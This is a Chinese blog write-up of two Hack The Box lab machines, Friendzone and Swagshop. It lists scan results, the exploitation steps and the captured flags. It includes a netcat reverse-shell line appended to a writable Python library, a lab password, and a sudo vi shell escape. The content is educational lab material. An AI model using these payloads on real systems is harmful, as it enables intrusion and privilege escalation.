HTB-oscplike-Friendzone+Swagshop

最新推荐文章于 2022-10-12 09:42:23 发布
最新推荐文章于 2022-10-12 09:42:23 发布
阅读量2.5k 收藏
点赞数
文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_53302733/article/details/123931270
版权

HTB-oscplike-Friendzone+Swagshop

Friendzone

easy难度的friendzone 靶机IP 10.10.10.123

sudo nmap -sC -sV -p- --min-rate=5000 -Pn 10.10.10.123

21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)

80看了看有一行Email us at: info@friendzoneportal.red 不管 先看端口

nmap --script smb-enum-shares.nse -p445 10.10.10.123 可以把路径一起爆了
smbmap -H 10.10.10.123 扫到一个general可读 development可读可写
smbclient //10.10.10.123/general 发现general里面admin:WORKWORKHhallelujah@#
但是这串密码是干勾八的呢 这里的443端口有ssl-cert: Subject: commonName=friendzone.red

结合题目多半是zone transfer 那就 sudo dig axfr @10.10.10.123 friendzone.red
里面的域名全加进hosts里 然后访问https://administrator1.friendzone.red
这里要注意把自己的代理关了 我习惯性一直开着burp这里就访问不了了
然后拿smb里的密码登录里面有一个文件包含 配合我们可写的development拿下shell
拿到user的flag a9ed20acecd6c5b6b52f474e15ae9a11

然后pspy发现在执行reporter.py 这个文件导入了os 而linpeas下发现os.py是可写的
echo “system(‘rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.21 7890 >/tmp/f’)” >> /usr/lib/python2.7/os.py
拿到root的flag b0e6c60b82cf96e9855ac1656a9e90c7

有一说一这个完全medium难度了 一点也不easy

请添加图片描述

Swagshop

easy难度的swagshop 靶机IP 10.10.10.140

sudo nmap -sC -sV -A -p- -Pn --min-rate=5000 10.10.10.140

22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))

dirsearch 在http://swagshop.htb/RELEASE_NOTES.txt下发现版本是1.7
80显示是magento 直接searchsploit 发现可以创造用户进入后台

进入后台后一个是有rce但是我这里python2搞得有点麻烦
另外一个可以在产品页面添加需要购买时上传一个文件 并且可以规定扩展名
后台设置好 前端上传shell 然后通过目录遍历漏洞用dirsearch扫出来的目录找到文件执行
拿到shell 拿到user的flag a448877277e82f05e5ddf9f90aefbac8

进去sudo -l发现可以用vi 看/var/www/html下的文件 那就直接vi -c 就行了
sudo vi /var/www/html/get.php -c ‘:!/bin/sh’ 拿到root的flag
c2b087d66e14a652a3b86a130ac56721
请添加图片描述

ore0
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
hackthebox-friendzone(考点:smb/dns/文件包含/linux修改脚本)
冬萍子癸水
04-14 519
nmap 看到21/139/445就要想到ftp&smb利用,看里面是否藏有敏感信息文件 看到53就要想到dns,修改/etc/hosts,添加10.10.10.123 friendzone.htb 先看ftp,登录不上 再看smb 四个常用指令,都看看,拿越多信息越好 smbmap -H 10.10.10.123 smbclient --list friendzone.htb -U...
【HTB系列】Swagshop
大方子
10-04 1971
靶机介绍 靶机IP:10.10.10.140 kali:10.10.12.69 先用nmap来对靶机进行探测 nmap -sC -sV -T 5 -oA Swagshop.nmap 10.10.10.140 扫描结果: # Nmap 7.80 scan initiated Fri Oct 4 13:24:03 2019 as: nmap -sC -sV -T 5 -oA Swagshop.nm...
HTB靶机系列-SwagShop
蚁景网安学院
07-16 688
介绍今天给大家带来的是一个HTB(hackthebox)的靶机—SwagShop,这是一个easy级别的linux系统的靶机,所以主要是对枚举,信息收集等手段的考察。对OSCP感兴趣的同...
【HTB系列】靶机FriendZone的渗透测试
大方子
07-24 1202
不知道为什么,CSDN文字和图片批量黏贴时,老是出现转存失败。 直接分享有道的文档,在弄一遍太累了 文档:【HTB系列】靶机FriendZone的渗透测试.... 链接:http://note.youdao.com/noteshare?id=6799653dc6fce316111bc0f2ea1c0b79&sub=594B0497FF3249C6ACF9D29AEB62D9...
Hack the box靶机 Swagshop
菜浪马废的博客
05-22 425
本来想按照顺序 做friendzone的 看看难度 剩下的四个里 他应该最难 还是往后面放一放吧 想想昨天的那个tartarsauce 我都要崩溃了 ![在这里插入图片描述](https://img-blog.csdnimg.cn/202005221558129.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzM4MDA1ODU0,size
shaper-scripts:示例防火墙 + HTB + IMQ
05-29
信息 ifconfig eth0: flags=4163<UP> mtu 1500 inet 192.168.120.160 网络掩码 255.255.255.0 广播 192.168.120.255 inet6:80:40ffab0c0c 前缀:80:40ffab0c00c 前缀:280:4000c0c e8:fa:b3 txqueuelen 1000 ...
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
ROS3.30 +HTB+DSCP-L7
10-11
ROS3.30 +HTB+DSCP-L7
BOB1.0.1靶机渗透攻略.pdf
09-21
网络安全渗透kali实战,提供bob1.0.1靶场,环境,详细攻略
oscp——htb——Tenten
王嘟嘟的博客
06-16 430
0x00 前言 0x01 信息收集 0x02 Web——USershell 首先来看下80端口的内容,可以看到是一个wp的站点 使用wpscan扫描获取到一个插件job-manager,还有一个用户名:takis 暂时无可利用的地方,这个看到这里发现如下的内容 这里看到8,应该是可以遍历的 使用burp进行遍历,发现在13的地方出现问题,这种应该是参数13的意思 这里知道有一个job-manager的洞,CVE-2015-6668,找到了文件的路径 http://10.10.10.10/wp
废物的靶场日记 htb-oscp-beep+cronos+nineveh
m0_53302733的博客
03-29 1324
HTB-oscplike-beep+cronos+nineveh Beep easy难度的beep 靶机IP10.10.10.7 sudo nmap -sC -sV -A --min-rate=5000 -p- -Pn 10.10.10.7 访问80后发现是一个elastix searchsploit搜到php/webapps/18650.py 修改参数后发现有一个extension需要修改但是不知道是什么勾八 google elastix extension后发现是sip extension 用svwar
hackthebox-swagshop(考点:magento安全 & vi提权)
冬萍子癸水
04-11 517
nmap 打开80,这是个网站,搜一下可以看到登录框。既然有magento的logo。不妨先查下什么是mangento 既然是个著名的电商系统,可以搜一下漏洞 有很多,因为py方便,就选择py,且37977.py前面似乎没写版本要求,可能这个更通用些,就试这个 打开看看,做点修改,把网址改成靶机的网址 运行,报错,根据报错提示,我直接把非code部分都删了 再运行,搞定,生成一个管理员账户 ...
废物的靶场日记 htb-oscp-nibbles
m0_53302733的博客
03-28 914
废物的靶场日记 htb-oscp-nibbles 简单的就不分割了 sudo nmap -sV -A -sC --min-rate=5000 -p- 10.10.10.75 -Pn 经典22 80 22/tcp open tcpwrapped 80/tcp open tcpwrapped 访问发现只有一句hello world!其他啥也没 纯纯的ctf了属于是 F12看到 /nibbleblog/ directory. Nothing interesting here! 进去看到一个网站 searc
靶机渗透练习90-Grotesque:1.0.1
hirak0的博客
05-02 2839
靶机描述 靶机地址:https://www.vulnhub.com/entry/grotesque-101,658/ Description get flags difficulty: medium about vm: tested and exported from virtualbox. dhcp and nested vtx/amdv enabled. you can contact me by email for troubleshooting or questions. This works
oscp学习计划二期
菜浪马废的博客
04-29 1258
一期 只有一点点基础知识的我 看着Google和vulnhub 一边刷练习 一边看笔记 慢慢也有了自己的知识框架 但是还是感觉准备的不充分 笔记 之前就拿CSDN做笔记了 每篇博客都很少有文字 大多都是我的操作截图 不是特别正规 为了备战 明天开始用官方的报告来写 但是他是五个一组 就是在一个文件中 要对五个靶机进行描述 希望我可以一天打五个靶机吧(现在一天最多3) 报告模板已经给了链接 有需要的...
Hack the box靶机 friendzone
菜浪马废的博客
05-24 251
之前得到一个账号 登录一下 上传文件
HackTheBox::FriendZone
aya3t的博客
10-12 262
HackTheBox::FriendZone
cozyhosting+htb
最新发布
09-20
CSDN AI助手(C知道):对于你提到的 "cozyhosting htb",我理解的是你在提及CTF平台Hack The Box中的CozyHosting机器。CozyHosting是一个涉及Web应用安全的挑战。你可能需要在Hack The Box平台上登录并进行相关操作才能解决这个挑战。具体的解题步骤我无法提供,因为每个挑战都设计得非常独特,需要你自己进行思考和尝试。 如果你对Hack The Box平台或CozyHosting有进一步的问题,我会尽力帮助你。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值